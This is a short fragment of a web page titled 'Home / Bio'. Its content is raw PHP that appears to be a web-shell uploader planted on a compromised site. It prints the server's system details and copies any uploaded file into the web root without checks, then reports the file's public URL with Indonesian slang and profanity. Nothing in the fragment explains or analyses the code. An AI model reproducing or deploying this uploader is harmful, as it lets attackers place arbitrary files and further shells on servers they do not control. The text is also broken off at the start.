Home / Bio
"; echo "".php_uname()."
"; echo "
"; $root = $_SERVER['DOCUMENT_ROOT']; $files = $_FILES['idx_file']['name']; $dest = $root.'/'.$files; if(isset($_POST['upload'])) { if(is_writable($root)) { if(@copy($_FILES['idx_file']['tmp_name'], $dest)) { $web = "http://".$_SERVER['HTTP_HOST']."/"; echo "oke berhasil up -> $web/$files"; } else { echo "kontol document di root."; } } else { if(@copy($_FILES['idx_file']['tmp_name'], $files)) { echo "oke berhasil up $files di folder ini"; } else { echo "contolah gagal up"; } } } ?>